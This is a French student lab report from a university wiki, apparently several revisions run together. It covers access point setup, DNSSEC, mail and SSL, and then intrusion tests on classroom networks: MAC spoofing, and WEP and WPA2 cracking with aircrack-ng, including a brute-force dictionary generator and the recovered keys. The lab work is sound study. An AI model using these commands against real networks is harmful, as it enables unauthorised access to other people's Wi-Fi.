04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
# ls<br />
# aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
# gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
# ./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
après quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23392
TP sysres IMA2a5 2015/2016 G3
2015-11-27T13:48:50Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<h2>Sécurisation Wifi par WPA2-EAP</h2><br />
<br />
<h3>Configuration du point d’accès</h3><br />
On commence par remettre le point d’accès en configuration d'usine <br />
<pre><br />
ap#erase startup-config<br />
ap#reload<br />
</pre><br />
<br />
Configuration:<br />
<pre><br />
ap(config)#line vty 0 15 <br />
ap(config-line)#password ****<br />
<br />
ap(config)#ip default-gateway 172.20.99.254<br />
<br />
ap(config)#interface bvi 1 <br />
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 <br />
</pre><br />
<br />
<h3>Configuration de la machine virtuel</h3><br />
<br />
On installe freeradius: <br />
<pre><br />
# apt-get install FreeRadius<br />
</pre><br />
<br />
On configure la conexion:<br />
<pre><br />
# nano eap.conf<br />
// on remplace <br />
default_eap_type = md5<br />
// par<br />
default_eap_type = peap<br />
<br />
# nano clients.conf <br />
client 172.20.99.0/24 {<br />
secret = topsecret<br />
shortname = wifi<br />
<br />
# nano users <br />
john Cleartext-Password := "****"<br />
<br />
# service freeradius restart<br />
</pre><br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
# /etc/ssh/sshd_config<br />
# PermitRootLogin yes<br />
<br />
# if down eth0 <br />
# ifup etho<br />
# apt-get purge network-manage systemd <br />
# inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
# service bind9 stop<br />
# service bind9 start<br />
</pre><br />
<br />
<br />
Géneration d'une clés assymetrique:<br />
<pre><br />
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE love-in-the-world.space<br />
Generating key pair...........+++ ....................+++ <br />
Klove-in-the-world.space.+005+14281<br />
# mv Klove-in-the-world.space.+005+14281.key love-in-the-world-ksk.key<br />
# mv Klove-in-the-world.space.+005+14281.private love-in-the-world-ksk.private<br />
<br />
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE love-in-the-world.space<br />
Generating key pair........++++++ .....................++++++ <br />
Klove-in-the-world.space.+005+37866<br />
# mv Klove-in-the-world.space.+005+37866.key love-in-the-world-zsk.key<br />
# mv Klove-in-the-world.space.+005+37866.private love-in-the-world-zsk.private<br />
<br />
# dnssec-signzone -o love-in-the-world.space -k love-in-the-world-ksk ../db.love-in-the-world love-in-the-world-zsk<br />
Verifying the zone using the following algorithms: RSASHA1.<br />
Zone fully signed:<br />
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked<br />
ZSKs: 1 active, 0 stand-by, 0 revoked<br />
../db.love-in-the-world.signed<br />
root@chien:/etc/bind/love-in-the-world# <br />
<br />
:/etc/bind# nano named.conf.local <br />
zone "love-in-the-world.space"{<br />
<br />
type master;<br />
file "/etc/bind/db.love-in-the-world.signed";<br />
};<br />
</pre><br />
<br />
<br />
ensuite on copie le contenu du fichier:<br />
dans gandi.net <br />
<br />
<br />
on peut verifier que notre dns est secure a l'adresse suivante:<br />
<url> http://dnsviz.net/d/love-in-the-world.space/dnssec/ </url><br />
<br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
# apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
# nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
# newaliases<br />
# mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
# mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<pre><br />
#nano 000-domain.tld-ssl.conf<br />
<VirtualHost 193.48.57.181:443><br />
<br />
ServerName www.love-in-the-world.space<br />
ServerAlias love-in-the-world.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /root/chien.crt<br />
SSLCertificateKeyFile /root/chien.key<br />
SSLCertificateChainFile /root/gandi.crt<br />
SSLVerifyClient None<br />
<br />
</VirtualHost><br />
<br />
#a2enmod ssl<br />
#service apache2 reload<br />
</pre><br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
# cat /etc/network/interfaces<br />
# source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
# auto lo<br />
# iface lo inet loopback<br />
<br />
Ethernet interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 172.26.79.241<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
# apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
# ls<br />
# aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
# gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
# ./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
après quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23383
TP sysres IMA2a5 2015/2016 G3
2015-11-27T12:47:57Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
